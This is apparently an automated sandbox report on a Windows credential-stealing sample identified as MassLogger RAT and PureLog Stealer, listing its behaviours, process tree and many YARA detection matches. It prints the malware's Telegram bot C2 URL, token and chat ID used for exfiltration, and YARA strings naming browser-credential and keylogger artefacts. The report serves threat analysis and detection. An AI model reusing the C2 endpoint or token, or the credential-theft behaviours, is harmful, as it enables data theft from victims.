Edit tour

Windows Analysis Report
nfKqna8HuC.exe

Overview

General Information

Sample name:	nfKqna8HuC.exe renamed because original name is a hash value
Original sample name:	d410880574c2296f6f028d4112101a3ed0184b016f4d52cbcc743fc81f21da2d.exe
Analysis ID:	1589102
MD5:	377f17e222f90e7dbb2d75c7ba9175f3
SHA1:	3aafb77c8fca8727985a1c1f3e06b54ef5f10f70
SHA256:	d410880574c2296f6f028d4112101a3ed0184b016f4d52cbcc743fc81f21da2d
Tags:	exeRedLineStealeruser-adrian__luca
Infos:

Detection

MassLogger RAT, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected PureLog Stealer

Yara detected Telegram RAT

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evaded block containing many API calls

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

nfKqna8HuC.exe (PID: 4836 cmdline: "C:\Users\user\Desktop\nfKqna8HuC.exe" MD5: 377F17E222F90E7DBB2D75C7BA9175F3)

RegSvcs.exe (PID: 5596 cmdline: "C:\Users\user\Desktop\nfKqna8HuC.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk", "Telegram Chatid": "1437092720"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2064042860.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A7 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c995:$a1: get_encryptedPassword 0x1c969:$a2: get_encryptedUsername 0x1ca2d:$a3: get_timePasswordChanged 0x1c945:$a4: get_passwordField 0x1c9ab:$a5: set_encryptedPassword 0x1c778:$a7: get_logins 0x1bcea:$a8: GetOutlookPasswords 0x1b1fe:$a9: StartKeylogger 0x19c5f:$a10: KeyLoggerEventArgs 0x19c2e:$a11: KeyLoggerEventArgsEventHandler 0x1c84c:$a13: _encryptedPassword
00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x210a5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x205a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x208b1:$a4: \Orbitum\User Data\Default\Login Data 0x216a9:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d87d:$a1: get_encryptedPassword 0x1d851:$a2: get_encryptedUsername 0x1d915:$a3: get_timePasswordChanged 0x1d82d:$a4: get_passwordField 0x1d893:$a5: set_encryptedPassword 0x1d660:$a7: get_logins 0x1cbd2:$a8: GetOutlookPasswords 0x1c0e6:$a9: StartKeylogger 0x1ab47:$a10: KeyLoggerEventArgs 0x1ab16:$a11: KeyLoggerEventArgsEventHandler 0x1d734:$a13: _encryptedPassword
00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x21f8d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2148b:$a3: \Google\Chrome\User Data\Default\Login Data 0x21799:$a4: \Orbitum\User Data\Default\Login Data 0x22591:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x21ded:$a1: get_encryptedPassword 0x4a125:$a1: get_encryptedPassword 0x21dc1:$a2: get_encryptedUsername 0x4a0f9:$a2: get_encryptedUsername 0x21e85:$a3: get_timePasswordChanged 0x4a1bd:$a3: get_timePasswordChanged 0x21d9d:$a4: get_passwordField 0x4a0d5:$a4: get_passwordField 0x21e03:$a5: set_encryptedPassword 0x4a13b:$a5: set_encryptedPassword 0x21bd0:$a7: get_logins 0x49f08:$a7: get_logins 0x21142:$a8: GetOutlookPasswords 0x4947a:$a8: GetOutlookPasswords 0x20656:$a9: StartKeylogger 0x4898e:$a9: StartKeylogger 0x1f0b7:$a10: KeyLoggerEventArgs 0x473ef:$a10: KeyLoggerEventArgs 0x1f086:$a11: KeyLoggerEventArgsEventHandler 0x473be:$a11: KeyLoggerEventArgsEventHandler 0x21ca4:$a13: _encryptedPassword
00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5e55b:$a1: get_encryptedPassword 0x5e52f:$a2: get_encryptedUsername 0x5e5f3:$a3: get_timePasswordChanged 0x5e50b:$a4: get_passwordField 0x5e571:$a5: set_encryptedPassword 0x5e33e:$a7: get_logins 0x5d8b0:$a8: GetOutlookPasswords 0x5cdc4:$a9: StartKeylogger 0x5b825:$a10: KeyLoggerEventArgs 0x5b7f4:$a11: KeyLoggerEventArgsEventHandler 0x5e412:$a13: _encryptedPassword
00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.3301740960.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A7 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
Process Memory Space: RegSvcs.exe PID: 5596	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 5596	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 5596	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 5596	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 5596	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x17429:$a1: get_encryptedPassword 0x252cd:$a1: get_encryptedPassword 0x3ce86:$a1: get_encryptedPassword 0x58b57:$a1: get_encryptedPassword 0x173fd:$a2: get_encryptedUsername 0x252a1:$a2: get_encryptedUsername 0x3ce5a:$a2: get_encryptedUsername 0x58b2b:$a2: get_encryptedUsername 0x174c1:$a3: get_timePasswordChanged 0x25365:$a3: get_timePasswordChanged 0x3cf1e:$a3: get_timePasswordChanged 0x58bef:$a3: get_timePasswordChanged 0x173d9:$a4: get_passwordField 0x2527d:$a4: get_passwordField 0x3ce36:$a4: get_passwordField 0x58b07:$a4: get_passwordField 0x1743f:$a5: set_encryptedPassword 0x252e3:$a5: set_encryptedPassword 0x3ce9c:$a5: set_encryptedPassword 0x58b6d:$a5: set_encryptedPassword 0x17215:$a7: get_logins
Click to see the 27 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.RegSvcs.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A7 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
2.2.RegSvcs.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A7 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
2.2.RegSvcs.exe.408e790.8.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.RegSvcs.exe.408e790.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.408e790.8.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.408e790.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.408e790.8.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c995:$a1: get_encryptedPassword 0x1c969:$a2: get_encryptedUsername 0x1ca2d:$a3: get_timePasswordChanged 0x1c945:$a4: get_passwordField 0x1c9ab:$a5: set_encryptedPassword 0x1c778:$a7: get_logins 0x1bcea:$a8: GetOutlookPasswords 0x1b1fe:$a9: StartKeylogger 0x19c5f:$a10: KeyLoggerEventArgs 0x19c2e:$a11: KeyLoggerEventArgsEventHandler 0x1c84c:$a13: _encryptedPassword
2.2.RegSvcs.exe.408e790.8.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x210a5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x205a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x208b1:$a4: \Orbitum\User Data\Default\Login Data 0x216a9:$a5: \Kometa\User Data\Default\Login Data
0.2.nfKqna8HuC.exe.1ff0000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C7 88 44 24 2B 88 44 24 2F B0 A7 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
2.2.RegSvcs.exe.2c21bc6.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.RegSvcs.exe.2c21bc6.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2c21bc6.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2c21bc6.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2c21bc6.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ab95:$a1: get_encryptedPassword 0x1ab69:$a2: get_encryptedUsername 0x1ac2d:$a3: get_timePasswordChanged 0x1ab45:$a4: get_passwordField 0x1abab:$a5: set_encryptedPassword 0x1a978:$a7: get_logins 0x19eea:$a8: GetOutlookPasswords 0x193fe:$a9: StartKeylogger 0x17e5f:$a10: KeyLoggerEventArgs 0x17e2e:$a11: KeyLoggerEventArgsEventHandler 0x1aa4c:$a13: _encryptedPassword
2.2.RegSvcs.exe.2c21bc6.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f2a5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e7a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x1eab1:$a4: \Orbitum\User Data\Default\Login Data 0x1f8a9:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.4065570.7.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.RegSvcs.exe.4065570.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.4065570.7.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.4065570.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.4065570.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ba7d:$a1: get_encryptedPassword 0x1ba51:$a2: get_encryptedUsername 0x1bb15:$a3: get_timePasswordChanged 0x1ba2d:$a4: get_passwordField 0x1ba93:$a5: set_encryptedPassword 0x1b860:$a7: get_logins 0x1add2:$a8: GetOutlookPasswords 0x1a2e6:$a9: StartKeylogger 0x18d47:$a10: KeyLoggerEventArgs 0x18d16:$a11: KeyLoggerEventArgsEventHandler 0x1b934:$a13: _encryptedPassword
2.2.RegSvcs.exe.4065570.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2018d:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1f68b:$a3: \Google\Chrome\User Data\Default\Login Data 0x1f999:$a4: \Orbitum\User Data\Default\Login Data 0x20791:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2fb0000.5.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.RegSvcs.exe.2fb0000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2fb0000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2fb0000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2fb0000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ab95:$a1: get_encryptedPassword 0x1ab69:$a2: get_encryptedUsername 0x1ac2d:$a3: get_timePasswordChanged 0x1ab45:$a4: get_passwordField 0x1abab:$a5: set_encryptedPassword 0x1a978:$a7: get_logins 0x19eea:$a8: GetOutlookPasswords 0x193fe:$a9: StartKeylogger 0x17e5f:$a10: KeyLoggerEventArgs 0x17e2e:$a11: KeyLoggerEventArgsEventHandler 0x1aa4c:$a13: _encryptedPassword
2.2.RegSvcs.exe.2fb0000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f2a5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e7a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x1eab1:$a4: \Orbitum\User Data\Default\Login Data 0x1f8a9:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.4066458.6.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.RegSvcs.exe.4066458.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.4066458.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.4066458.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.4066458.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ab95:$a1: get_encryptedPassword 0x1ab69:$a2: get_encryptedUsername 0x1ac2d:$a3: get_timePasswordChanged 0x1ab45:$a4: get_passwordField 0x1abab:$a5: set_encryptedPassword 0x1a978:$a7: get_logins 0x19eea:$a8: GetOutlookPasswords 0x193fe:$a9: StartKeylogger 0x17e5f:$a10: KeyLoggerEventArgs 0x17e2e:$a11: KeyLoggerEventArgsEventHandler 0x1aa4c:$a13: _encryptedPassword
2.2.RegSvcs.exe.4066458.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f2a5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e7a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x1eab1:$a4: \Orbitum\User Data\Default\Login Data 0x1f8a9:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2fb0000.5.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.RegSvcs.exe.2fb0000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2fb0000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2fb0000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2fb0000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c995:$a1: get_encryptedPassword 0x1c969:$a2: get_encryptedUsername 0x1ca2d:$a3: get_timePasswordChanged 0x1c945:$a4: get_passwordField 0x1c9ab:$a5: set_encryptedPassword 0x1c778:$a7: get_logins 0x1bcea:$a8: GetOutlookPasswords 0x1b1fe:$a9: StartKeylogger 0x19c5f:$a10: KeyLoggerEventArgs 0x19c2e:$a11: KeyLoggerEventArgsEventHandler 0x1c84c:$a13: _encryptedPassword
2.2.RegSvcs.exe.2fb0000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x210a5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x205a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x208b1:$a4: \Orbitum\User Data\Default\Login Data 0x216a9:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2c21bc6.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.RegSvcs.exe.2c21bc6.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2c21bc6.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2c21bc6.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2c21bc6.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1c995:$a1: get_encryptedPassword 0x1c969:$a2: get_encryptedUsername 0x1ca2d:$a3: get_timePasswordChanged 0x1c945:$a4: get_passwordField 0x1c9ab:$a5: set_encryptedPassword 0x1c778:$a7: get_logins 0x1bcea:$a8: GetOutlookPasswords 0x1b1fe:$a9: StartKeylogger 0x19c5f:$a10: KeyLoggerEventArgs 0x19c2e:$a11: KeyLoggerEventArgsEventHandler 0x1c84c:$a13: _encryptedPassword
2.2.RegSvcs.exe.2c21bc6.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x210a5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x205a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x208b1:$a4: \Orbitum\User Data\Default\Login Data 0x216a9:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2e20ee8.4.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.RegSvcs.exe.2e20ee8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2e20ee8.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.2e20ee8.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2e20ee8.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1ab95:$a1: get_encryptedPassword 0x1ab69:$a2: get_encryptedUsername 0x1ac2d:$a3: get_timePasswordChanged 0x1ab45:$a4: get_passwordField 0x1abab:$a5: set_encryptedPassword 0x1a978:$a7: get_logins 0x19eea:$a8: GetOutlookPasswords 0x193fe:$a9: StartKeylogger 0x17e5f:$a10: KeyLoggerEventArgs 0x17e2e:$a11: KeyLoggerEventArgsEventHandler 0x1aa4c:$a13: _encryptedPassword
2.2.RegSvcs.exe.2e20ee8.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1f2a5:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1e7a3:$a3: \Google\Chrome\User Data\Default\Login Data 0x1eab1:$a4: \Orbitum\User Data\Default\Login Data 0x1f8a9:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.4066458.6.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
2.2.RegSvcs.exe.4066458.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.4066458.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.4066458.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
